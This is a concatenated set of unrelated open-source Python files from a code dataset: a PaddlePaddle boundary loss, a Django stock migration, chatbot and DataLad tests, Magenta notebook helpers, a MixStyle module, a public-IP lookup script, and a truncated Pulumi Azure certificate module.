            paddle.unsqueeze(
                label, axis=1).astype('float32'),
            self.laplacian_kernel,
            padding=1)
        boundary_targets = paddle.clip(boundary_targets, min=0)
        boundary_targets = boundary_targets > 0.1
        boundary_targets = boundary_targets.astype('float32')
        # Same edge detection at stride 2 (half resolution).
        boundary_targets_x2 = F.conv2d(
            paddle.unsqueeze(
                label, axis=1).astype('float32'),
            self.laplacian_kernel,
            stride=2,
            padding=1)
        boundary_targets_x2 = paddle.clip(boundary_targets_x2, min=0)
        # Stride 4 (quarter resolution).
        boundary_targets_x4 = F.conv2d(
            paddle.unsqueeze(
                label, axis=1).astype('float32'),
            self.laplacian_kernel,
            stride=4,
            padding=1)
        boundary_targets_x4 = paddle.clip(boundary_targets_x4, min=0)
        # NOTE(review): the stride-8 maps below are computed, upsampled and
        # thresholded but never used (only strides 1, 2, 4 are stacked) --
        # presumably leftover; confirm before removing the dead computation.
        boundary_targets_x8 = F.conv2d(
            paddle.unsqueeze(
                label, axis=1).astype('float32'),
            self.laplacian_kernel,
            stride=8,
            padding=1)
        boundary_targets_x8 = paddle.clip(boundary_targets_x8, min=0)
        # Upsample the strided maps back to full resolution, then binarize.
        boundary_targets_x8_up = F.interpolate(
            boundary_targets_x8, boundary_targets.shape[2:], mode='nearest')
        boundary_targets_x4_up = F.interpolate(
            boundary_targets_x4, boundary_targets.shape[2:], mode='nearest')
        boundary_targets_x2_up = F.interpolate(
            boundary_targets_x2, boundary_targets.shape[2:], mode='nearest')
        boundary_targets_x2_up = boundary_targets_x2_up > 0.1
        boundary_targets_x2_up = boundary_targets_x2_up.astype('float32')
        boundary_targets_x4_up = boundary_targets_x4_up > 0.1
        boundary_targets_x4_up = boundary_targets_x4_up.astype('float32')
        boundary_targets_x8_up = boundary_targets_x8_up > 0.1
        boundary_targets_x8_up = boundary_targets_x8_up.astype('float32')
        # Stack the three scales and fuse them with the learnable 1x1 conv
        # into a single binary boundary target.
        boudary_targets_pyramids = paddle.stack(
            (boundary_targets, boundary_targets_x2_up, boundary_targets_x4_up),
            axis=1)
        boudary_targets_pyramids = paddle.squeeze(
            boudary_targets_pyramids, axis=2)
        boudary_targets_pyramid = F.conv2d(boudary_targets_pyramids,
                                           self.fuse_kernel)
        boudary_targets_pyramid = boudary_targets_pyramid > 0.1
        boudary_targets_pyramid = boudary_targets_pyramid.astype('float32')
        # Resize logits to the target resolution when they differ.
        if logits.shape[-1] != boundary_targets.shape[-1]:
            logits = F.interpolate(
                logits,
                boundary_targets.shape[2:],
                mode='bilinear',
                align_corners=True)
        # Detail loss = BCE + dice against the fused boundary target.
        bce_loss = F.binary_cross_entropy_with_logits(logits,
                                                      boudary_targets_pyramid)
        dice_loss = self.fixed_dice_loss_func(
            F.sigmoid(logits), boudary_targets_pyramid)
        detail_loss = bce_loss + dice_loss
        # Targets are derived from the label; don't backprop through it.
        label.stop_gradient = True
        return detail_loss

    def fixed_dice_loss_func(self, input, target):
        """
        simplified diceloss for DetailAggregateLoss.
        """
        smooth = 1.
        n = input.shape[0]
        # Flatten each sample so the dice ratio is computed per batch item.
        iflat = paddle.reshape(input, [n, -1])
        tflat = paddle.reshape(target, [n, -1])
        intersection = paddle.sum((iflat * tflat), axis=1)
        loss = 1 - (
            (2. * intersection + smooth) /
            (paddle.sum(iflat, axis=1) + paddle.sum(tflat, axis=1) + smooth))
        return paddle.mean(loss)
| 39.10274 | 90 | 0.622876 |
f23a20395d9ed00d6ccb79d44268967facb21461 | 2,512 | py | Python | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 1 | 2021-09-30T05:25:08.000Z | 2021-09-30T05:25:08.000Z | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 8 | 2021-09-30T05:27:09.000Z | 2021-12-03T23:02:24.000Z | backend/stock/migrations/0001_initial.py | fengxia41103/stock | 1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1 | [
"MIT"
] | 3 | 2021-09-29T05:11:45.000Z | 2021-10-31T07:26:31.000Z | # Generated by Django 3.1.6 on 2021-02-09 00:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration for the stock app: creates the
    # MyStock, MyStockHistorical, MyStrategyValue and MySector tables.

    initial = True

    dependencies = [
    ]

    operations = [
        # A stock, identified by its ticker symbol.
        migrations.CreateModel(
            name='MyStock',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=8)),
            ],
        ),
        # One row of daily OHLC history per stock per date (unique together).
        migrations.CreateModel(
            name='MyStockHistorical',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('on', models.DateField(verbose_name='Date')),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close', models.FloatField()),
                ('vol', models.FloatField(verbose_name='Volume (000)')),
                ('stock', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stocks', to='stock.mystock')),
            ],
            options={
                'unique_together': {('stock', 'on')},
                'index_together': {('stock', 'on')},
            },
        ),
        # A computed strategy value attached to one historical row.
        migrations.CreateModel(
            name='MyStrategyValue',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('method', models.IntegerField(choices=[(1, 'daily return'), (2, 'overnight return')], default=1)),
                ('val', models.FloatField(blank=True, default=-1, null=True)),
                ('hist', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stock.mystockhistorical')),
            ],
        ),
        # A sector grouping many stocks.
        migrations.CreateModel(
            name='MySector',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('code', models.CharField(max_length=8, verbose_name='Sector code')),
                ('description', models.TextField(blank=True, null=True)),
                ('stocks', models.ManyToManyField(to='stock.MyStock')),
            ],
        ),
    ]
| 41.866667 | 133 | 0.552946 |
e8b34896d5acdd076d4c1539ce60945d5dc8c319 | 1,009 | py | Python | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:13:45.000Z | 2018-09-01T20:00:55.000Z | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 1 | 2018-09-12T18:30:17.000Z | 2018-09-12T18:30:17.000Z | test/programytest/storage/stores/sql/store/test_gender.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:08:36.000Z | 2018-09-23T06:11:04.000Z | import unittest
from programytest.storage.asserts.store.assert_genders import GenderStoreAsserts
from programy.storage.stores.sql.store.lookups import SQLGenderStore
from programy.storage.stores.sql.engine import SQLStorageEngine
from programy.storage.stores.sql.config import SQLStorageConfiguration
import programytest.storage.engines as Engines
class SQLGenderStoreTests(GenderStoreAsserts):

    def _initialised_engine_and_store(self):
        """Build a freshly initialised SQL engine and a gender store on top of it."""
        engine = SQLStorageEngine(SQLStorageConfiguration())
        engine.initialise()
        return engine, SQLGenderStore(engine)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_initialise(self):
        # The store must remember the engine it was constructed with.
        engine, store = self._initialised_engine_and_store()
        self.assertEqual(store.storage_engine, engine)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_upload_from_file(self):
        # Delegates the actual upload assertions to the shared asserts mixin.
        _, store = self._initialised_engine_and_store()
        self.assert_upload_from_text_file(store)
1faf75489c955330b8ef37634bf5dea45a13a46c | 66 | py | Python | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/list_subscr.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | lst = ["hello", "world"]
print lst[0]
str = "hello"
print str[0] | 11 | 24 | 0.590909 |
b73a56069b2aac029ad8c40efe2c16e9561bb469 | 2,623 | py | Python | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | datalad_neuroimaging/extractors/tests/test_nidm.py | bpoldrack/datalad-medicalimaging | 2afd1314a4eef87015f1507094aead5c502724d7 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test NIDM extractor"""
from shutil import copy
from os.path import dirname
from os.path import join as opj
from datalad.api import Dataset
from datalad.tests.utils import with_tempfile
from datalad.tests.utils import ok_clean_git
from datalad.tests.utils import assert_status
from datalad.tests.utils import assert_result_count
from . import datalad_extracts_annex_key
@with_tempfile(mkdir=True)
def test_nidm(path):
    """End-to-end check of the NIDM metadata extractor.

    Creates a dataset containing one NIfTI file, runs metadata aggregation,
    and compares the dataset-level metadata against the expected structure.
    """
    ds = Dataset(path).create()
    ds.config.add('datalad.metadata.nativetype', 'nidm', where='dataset')
    # Fill the dataset with something that NIDM info could be extracted from.
    copy(
        opj(dirname(dirname(dirname(__file__))), 'tests', 'data', 'files', 'nifti1.nii.gz'),
        path)
    ds.add('.')
    # all nice and tidy, nothing untracked
    ok_clean_git(ds.path)
    # engage the extractor(s)
    res = ds.aggregate_metadata()
    # aggregation done without whining
    assert_status('ok', res)
    res = ds.metadata(reporton='datasets')
    # ATM we do not foresee file-based metadata to come back from NIDM
    assert_result_count(res, 1)
    # Strip volatile fields (version, refcommit) before the exact comparison.
    core = res[0]['metadata']['datalad_core']
    core.pop('version', None)
    core.pop('refcommit')
    # Full expected structure of the assembled metadata from the demo content.
    target_metadata = {
        "@context": {"@vocab": "http://docs.datalad.org/schema_v2.0.json"},
        "datalad_core": {"@id": ds.id}, "nidm": {
            "@context": {"mydurationkey": {"@id": "time:Duration"},
                         "myvocabprefix": {
                             "@id": "http://purl.org/ontology/mydefinition",
                             "description": "I am a vocabulary",
                             "type":
                             "http://purl.org/dc/dcam/VocabularyEncodingScheme"}},
            "mydurationkey": 0.6}}
    if datalad_extracts_annex_key:
        # Some DataLad versions additionally report the annex key of the file.
        target_metadata['datalad_unique_content_properties'] = \
            {
                "annex": {
                    "key": [
                        "MD5E-s15920--acfb708aa74951cfff1a9d466f6d77be.nii.gz"
                    ]
                }
            }
    assert_result_count(res, 1, metadata=target_metadata)
| 39.149254 | 107 | 0.582158 |
f803dce75084e5f681a61886b132f24ad8716764 | 7,827 | py | Python | magenta/music/notebook_utils.py | cristianmtr/magenta | ac2d8ae455fdd07f4b46dec82aedab22fcb6bbbd | [
"Apache-2.0"
] | 1 | 2019-01-24T07:22:48.000Z | 2019-01-24T07:22:48.000Z | magenta/music/notebook_utils.py | dkun7944/magenta | 8f930263b7cfd67f27eb12cd871b4e5fa87d382e | [
"Apache-2.0"
] | null | null | null | magenta/music/notebook_utils.py | dkun7944/magenta | 8f930263b7cfd67f27eb12cd871b4e5fa87d382e | [
"Apache-2.0"
] | 1 | 2019-11-26T06:30:52.000Z | 2019-11-26T06:30:52.000Z | # Copyright 2018 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python functions which run only within a Jupyter or Colab notebook."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import collections
import io
import os
import bokeh
import bokeh.plotting
from IPython import display
from magenta.music import midi_synth
import numpy as np
import pandas as pd
from scipy.io import wavfile
from six.moves import urllib
import tensorflow as tf
_DEFAULT_SAMPLE_RATE = 44100
_play_id = 0 # Used for ephemeral colab_play.
def colab_play(array_of_floats, sample_rate, ephemeral=True, autoplay=False):
  """Creates an HTML5 audio widget to play a sound in Colab.

  This function should only be called from a Colab notebook.

  Args:
    array_of_floats: A 1D or 2D array-like container of float sound
      samples. Values outside of the range [-1, 1] will be clipped.
    sample_rate: Sample rate in samples per second.
    ephemeral: If set to True, the widget will be ephemeral, and disappear
      on reload (and it won't be counted against realtime document size).
    autoplay: If True, automatically start playing the sound when the
      widget is rendered.
  """
  # Colab-only dependency; imported lazily so the module still loads in
  # plain Jupyter.
  from google.colab.output import _js_builder as js  # pylint:disable=g-import-not-at-top,protected-access,import-error
  normalizer = float(np.iinfo(np.int16).max)
  # Clip to [-1, 1] before scaling, as promised in the docstring. The old
  # code cast without clipping, so out-of-range samples wrapped around when
  # converted to int16 and produced loud artifacts.
  clipped = np.clip(np.asarray(array_of_floats), -1.0, 1.0)
  array_of_ints = np.array(clipped * normalizer, dtype=np.int16)
  memfile = io.BytesIO()
  wavfile.write(memfile, sample_rate, array_of_ints)
  html = """<audio controls {autoplay}>
              <source controls src="data:audio/wav;base64,{base64_wavfile}"
              type="audio/wav" />
              Your browser does not support the audio element.
            </audio>"""
  # b64encode returns bytes on Python 3; decode so the data URI does not end
  # up containing a literal "b'...'" repr (which made the widget silent).
  html = html.format(
      autoplay='autoplay' if autoplay else '',
      base64_wavfile=base64.b64encode(memfile.getvalue()).decode('ascii'))
  memfile.close()
  global _play_id
  _play_id += 1
  if ephemeral:
    # Inject the widget via JS so it is not persisted in the notebook.
    element = 'id_%s' % _play_id
    display.display(display.HTML('<div id="%s"> </div>' % element))
    js.Js('document', mode=js.EVAL).getElementById(element).innerHTML = html
  else:
    display.display(display.HTML(html))
def play_sequence(sequence,
                  synth=midi_synth.synthesize,
                  sample_rate=_DEFAULT_SAMPLE_RATE,
                  colab_ephemeral=True,
                  **synth_args):
  """Synthesizes a note sequence and renders an interactive audio player.

  Only meaningful inside a Jupyter or Colab notebook.

  Args:
    sequence: A music_pb2.NoteSequence to synthesize and play.
    synth: A synthesis function taking a sequence and sample rate.
    sample_rate: Sample rate used for synthesis.
    colab_ephemeral: In Colab, make the widget ephemeral (not persisted and
      not counted against realtime document size).
    **synth_args: Extra keyword arguments forwarded to `synth`.
  """
  audio_samples = synth(sequence, sample_rate=sample_rate, **synth_args)
  try:
    # Use the Colab-specific widget when google.colab is importable; any
    # ImportError (including from within colab_play) falls through to the
    # stock IPython widget.
    import google.colab  # pylint: disable=unused-import,unused-variable,g-import-not-at-top
    colab_play(audio_samples, sample_rate, colab_ephemeral)
  except ImportError:
    display.display(display.Audio(audio_samples, rate=sample_rate))
def plot_sequence(sequence,
                  show_figure=True):
  """Creates an interactive pianoroll for a tensorflow.magenta.NoteSequence.

  Example usage: plot a random melody.
    sequence = mm.Melody(np.random.randint(36, 72, 30)).to_sequence()
    plot_sequence(sequence)

  Args:
     sequence: A tensorflow.magenta.NoteSequence.
     show_figure: A boolean indicating whether or not to show the figure.

  Returns:
     If show_figure is False, a Bokeh figure; otherwise None.
  """

  def _sequence_to_pandas_dataframe(sequence):
    """Generates a pandas dataframe from a sequence."""
    pd_dict = collections.defaultdict(list)
    for note in sequence.notes:
      pd_dict['start_time'].append(note.start_time)
      pd_dict['end_time'].append(note.end_time)
      pd_dict['duration'].append(note.end_time - note.start_time)
      pd_dict['pitch'].append(note.pitch)
      # top/bottom delimit the drawn rectangle for each note (0.8 tall).
      pd_dict['bottom'].append(note.pitch - 0.4)
      pd_dict['top'].append(note.pitch + 0.4)
      pd_dict['velocity'].append(note.velocity)
      # Map MIDI velocity (0-127) to an alpha in [0, 1).
      pd_dict['fill_alpha'].append(note.velocity / 128.0)
      pd_dict['instrument'].append(note.instrument)
      pd_dict['program'].append(note.program)

    # If no velocity differences are found, set alpha to 1.0.
    if np.max(pd_dict['velocity']) == np.min(pd_dict['velocity']):
      pd_dict['fill_alpha'] = [1.0] * len(pd_dict['fill_alpha'])

    return pd.DataFrame(pd_dict)

  # These are hard-coded reasonable values, but the user can override them
  # by updating the figure if need be.
  fig = bokeh.plotting.figure(
      tools='hover,pan,box_zoom,reset,previewsave')
  fig.plot_width = 500
  fig.plot_height = 200
  fig.xaxis.axis_label = 'time (sec)'
  fig.yaxis.axis_label = 'pitch (MIDI)'
  # One tick/grid line per octave (12 semitones).
  fig.yaxis.ticker = bokeh.models.SingleIntervalTicker(interval=12)
  fig.ygrid.ticker = bokeh.models.SingleIntervalTicker(interval=12)
  # Pick indexes that are maximally different in Spectral8 colormap.
  spectral_color_indexes = [7, 0, 6, 1, 5, 2, 3]

  # Create a Pandas dataframe and group it by instrument.
  dataframe = _sequence_to_pandas_dataframe(sequence)
  instruments = sorted(set(dataframe['instrument']))
  grouped_dataframe = dataframe.groupby('instrument')
  # Draw one quad glyph set per instrument, cycling through the palette.
  for counter, instrument in enumerate(instruments):
    instrument_df = grouped_dataframe.get_group(instrument)
    color_idx = spectral_color_indexes[counter % len(spectral_color_indexes)]
    color = bokeh.palettes.Spectral8[color_idx]
    source = bokeh.plotting.ColumnDataSource(instrument_df)
    fig.quad(top='top', bottom='bottom', left='start_time', right='end_time',
             line_color='black', fill_color=color,
             fill_alpha='fill_alpha', source=source)
  # Hover tooltip shows the per-note attributes from the dataframe columns.
  fig.select(dict(type=bokeh.models.HoverTool)).tooltips = (
      {'pitch': '@pitch',
       'program': '@program',
       'velo': '@velocity',
       'duration': '@duration',
       'start_time': '@start_time',
       'end_time': '@end_time',
       'velocity': '@velocity',
       'fill_alpha': '@fill_alpha'})

  if show_figure:
    bokeh.plotting.output_notebook()
    bokeh.plotting.show(fig)
    return None
  return fig
def download_bundle(bundle_name, target_dir, force_reload=False):
  """Downloads a Magenta bundle to target directory.

  Target directory target_dir will be created if it does not already exist.

  Args:
    bundle_name: A string Magenta bundle name to download.
    target_dir: A string local directory in which to write the bundle.
    force_reload: A boolean that when True, reloads the bundle even if present.
  """
  tf.gfile.MakeDirs(target_dir)
  bundle_target = os.path.join(target_dir, bundle_name)
  if not os.path.exists(bundle_target) or force_reload:
    response = urllib.request.urlopen(
        'http://download.magenta.tensorflow.org/models/%s' % bundle_name)
    try:
      data = response.read()
    finally:
      # Always release the connection, even if the read fails.
      response.close()
    # Context manager guarantees the file handle is closed on any error;
    # the old open/write/close sequence leaked the handle on exceptions.
    with open(bundle_target, 'wb') as local_file:
      local_file.write(data)
| 38.180488 | 120 | 0.716622 |
7eb151bf06a181ed4bc6f54f562bffc49f35deaf | 3,127 | py | Python | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 160 | 2021-01-13T07:17:27.000Z | 2022-03-30T14:43:54.000Z | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 15 | 2021-03-23T22:30:20.000Z | 2022-03-29T03:04:33.000Z | Dassl/dassl/modeling/ops/mixstyle.py | xch-liu/geom-tex-dg | 59a93684ae13e7d962908e9971fcbfba66d90b80 | [
"MIT"
] | 22 | 2021-01-18T06:37:45.000Z | 2022-03-16T07:37:15.000Z | import random
from contextlib import contextmanager
import torch
import torch.nn as nn
def deactivate_mixstyle(m):
    """Switch a MixStyle module off; intended for use with `model.apply`."""
    if type(m) != MixStyle:
        return
    m.set_activation_status(False)
def activate_mixstyle(m):
    """Switch a MixStyle module on; intended for use with `model.apply`."""
    if type(m) != MixStyle:
        return
    m.set_activation_status(True)
def random_mixstyle(m):
    """Set a MixStyle module to 'random' mixing; for use with `model.apply`."""
    if type(m) != MixStyle:
        return
    m.update_mix_method('random')
def crossdomain_mixstyle(m):
    """Set a MixStyle module to 'crossdomain' mixing; for use with `model.apply`."""
    if type(m) != MixStyle:
        return
    m.update_mix_method('crossdomain')
@contextmanager
def run_without_mixstyle(model):
    """Context manager that temporarily disables MixStyle modules in `model`.

    Assumes MixStyle was initially activated; modules are re-activated on
    exit even if the wrapped block raises.
    """
    try:
        model.apply(deactivate_mixstyle)
        yield
    finally:
        model.apply(activate_mixstyle)
@contextmanager
def run_with_mixstyle(model, mix=None):
    """Context manager that temporarily enables MixStyle modules in `model`.

    Assumes MixStyle was initially deactivated. When `mix` is 'random' or
    'crossdomain' the mixing method is switched first; any other value
    leaves the method untouched. MixStyle is deactivated again on exit,
    even if the wrapped block raises.
    """
    method_setters = {
        'random': random_mixstyle,
        'crossdomain': crossdomain_mixstyle,
    }
    setter = method_setters.get(mix)
    if setter is not None:
        model.apply(setter)
    try:
        model.apply(activate_mixstyle)
        yield
    finally:
        model.apply(deactivate_mixstyle)
class MixStyle(nn.Module):
    """MixStyle: mixes per-instance feature statistics across batch samples.

    Reference:
      Zhou et al. Domain Generalization with MixStyle. ICLR 2021.
    """

    def __init__(self, p=0.5, alpha=0.1, eps=1e-6, mix='random'):
        """
        Args:
          p (float): probability of using MixStyle.
          alpha (float): parameter of the Beta distribution.
          eps (float): scaling parameter to avoid numerical issues.
          mix (str): how to mix ('random' or 'crossdomain').
        """
        super().__init__()
        self.p = p
        self.beta = torch.distributions.Beta(alpha, alpha)
        self.eps = eps
        self.alpha = alpha
        self.mix = mix
        # Runtime switch; toggled through set_activation_status() (see the
        # module-level *_mixstyle helpers used with model.apply).
        self._activated = True

    def __repr__(self):
        return f'MixStyle(p={self.p}, alpha={self.alpha}, eps={self.eps}, mix={self.mix})'

    def set_activation_status(self, status=True):
        # Enable/disable forward-time mixing without removing the module.
        self._activated = status

    def update_mix_method(self, mix='random'):
        self.mix = mix

    def forward(self, x):
        # Identity unless: training mode, activated, and the p-coin flip hits.
        if not self.training or not self._activated:
            return x

        if random.random() > self.p:
            return x

        B = x.size(0)

        # Per-sample, per-channel statistics over dims 2 and 3 -- assumes a
        # 4-D (batch, channel, H, W) input; confirm at call sites.
        mu = x.mean(dim=[2, 3], keepdim=True)
        var = x.var(dim=[2, 3], keepdim=True)
        sig = (var + self.eps).sqrt()
        # Statistics are treated as constants: no gradient flows through them.
        mu, sig = mu.detach(), sig.detach()
        x_normed = (x-mu) / sig

        # Per-sample mixing coefficients drawn from Beta(alpha, alpha).
        lmda = self.beta.sample((B, 1, 1, 1))
        lmda = lmda.to(x.device)

        if self.mix == 'random':
            # random shuffle
            perm = torch.randperm(B)

        elif self.mix == 'crossdomain':
            # split into two halves and swap the order
            perm = torch.arange(B - 1, -1, -1) # inverse index
            perm_b, perm_a = perm.chunk(2)
            perm_b = perm_b[torch.randperm(B // 2)]
            perm_a = perm_a[torch.randperm(B // 2)]
            perm = torch.cat([perm_b, perm_a], 0)

        else:
            raise NotImplementedError

        # Convex-combine each sample's statistics with its partner's, then
        # re-style the normalized features with the mixed statistics.
        mu2, sig2 = mu[perm], sig[perm]
        mu_mix = mu*lmda + mu2 * (1-lmda)
        sig_mix = sig*lmda + sig2 * (1-lmda)

        return x_normed*sig_mix + mu_mix
18171409a64f54c584a3509a99a7c76a99460e6b | 515 | py | Python | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | utils/getip.py | meta-chen/AdslProxy | 0e06da88c91750a128a2fc1d0291e8017346a377 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/28 12:30
# @Author : Meta_Chen
# @File : getip.py
# @Software: PyCharm
# @Target: 获取公网ip
import requests
import re
class GetIP:
    """Resolve this machine's public IP address via Sohu's echo service.

    The previous revision issued the HTTP request as a class attribute, i.e.
    at module-import time; the request is now deferred to ``getip()``.
    """

    # Sohu echoes the caller's public IP inside a small JS snippet.
    _URL = "http://txt.go.sohu.com/ip/soip"

    def getip(self):
        """Return the public IPv4 address as a dotted-quad string.

        Raises:
            IndexError: if the service response contains no IPv4 literal.
        """
        # Kept as an attribute for backward compatibility with code that
        # inspected GetIP's `response`.
        self.response = requests.get(self._URL)
        text = self.response.text
        # Dots are escaped: the old pattern r'\d+.\d+.\d+.\d+' let '.' match
        # any character, so non-IP digit runs could match too.
        myip = re.findall(r'\d+\.\d+\.\d+\.\d+', text)
        return myip[0]
def main():
    """Entry point: print the public IP address discovered by GetIP."""
    print(GetIP().getip())
if __name__ == '__main__':
main() | 18.392857 | 61 | 0.565049 |
4550d3721ac11b953db2f52cf6705bb340e57160 | 17,716 | py | Python | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/automation/certificate.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CertificateArgs', 'Certificate']
@pulumi.input_type
class CertificateArgs:
def __init__(__self__, *,
automation_account_name: pulumi.Input[str],
base64: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Certificate resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "automation_account_name", automation_account_name)
pulumi.set(__self__, "base64", base64)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Input[str]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def base64(self) -> pulumi.Input[str]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@base64.setter
def base64(self, value: pulumi.Input[str]):
pulumi.set(self, "base64", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _CertificateState:
def __init__(__self__, *,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exportable: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Certificate resources.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] thumbprint: The thumbprint for the certificate.
"""
if automation_account_name is not None:
pulumi.set(__self__, "automation_account_name", automation_account_name)
if base64 is not None:
pulumi.set(__self__, "base64", base64)
if description is not None:
pulumi.set(__self__, "description", description)
if exportable is not None:
